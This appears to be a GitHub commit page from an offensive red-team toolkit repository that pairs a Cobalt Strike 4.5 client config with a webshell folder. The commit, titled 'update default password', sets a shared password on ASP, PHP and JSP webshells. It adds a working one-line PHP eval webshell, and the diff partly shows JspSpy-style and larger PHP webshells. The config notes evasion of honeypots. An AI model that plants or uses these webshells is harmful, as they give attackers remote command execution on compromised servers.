Skip to content

Commit

Permalink
更新默认密码
Browse files Browse the repository at this point in the history
  • Loading branch information
jindaxia committed Mar 19, 2023
1 parent 4721a68 commit 6464919
Show file tree
Hide file tree
Showing 7 changed files with 8 additions and 6 deletions.
2 changes: 1 addition & 1 deletion CS4.5 cats/CatClient.properties
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ CatClient.OpenAuth = false
CatClient.InjectSelf = true

# 客户端主题配置,0是原版,1是白色,2是黑色
CatClient.theme = 2
CatClient.theme = 0
# 配置文件存放名称,防止被蜜罐读取
CatClient.ini_name = .demo

Expand Down
1 change: 1 addition & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -29,3 +29,4 @@
- type: powershell IEX
- 协同作战工具
- 需求资产信息实时同步
- 内网聊天工具(飞鸽传书)
2 changes: 1 addition & 1 deletion webshell/pubac.asp
Original file line number Diff line number Diff line change
@@ -1 +1 @@
<%eval request('pass')%>
<%eval request('synb123')%>
1 change: 1 addition & 0 deletions webshell/pubac.php
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<?php @eval($_POST['synb123']);?>
4 changes: 2 additions & 2 deletions webshell/pubacbig.asp

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion webshell/pubacbig.jsp
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@
<%@page import="java.awt.datatransfer.DataFlavor"%>
<%@page import="java.util.prefs.Preferences"%>
<%!
private static final String PW = "hack"; //password
private static final String PW = "synb123"; //password
private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
private static final String REQUEST_CHARSET = "ISO-8859-1";
private static final String PAGE_CHARSET = "UTF-8";
Expand Down
2 changes: 1 addition & 1 deletion webshell/pubacbig.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
<?php
$password='admin';//Ĭ������admin
$password='synb123';//Ĭ������admin
$shellname='��վ��ȫ���';//�ҵİ�Ȩ
$myurl="caidaome.com������ǿ�汾phpľ�� ������Ȩ0day ���ڸ�����ɱ";//�ҵ���ҳ
error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);
Expand Down

0 comments on commit 6464919

Please sign in to comment.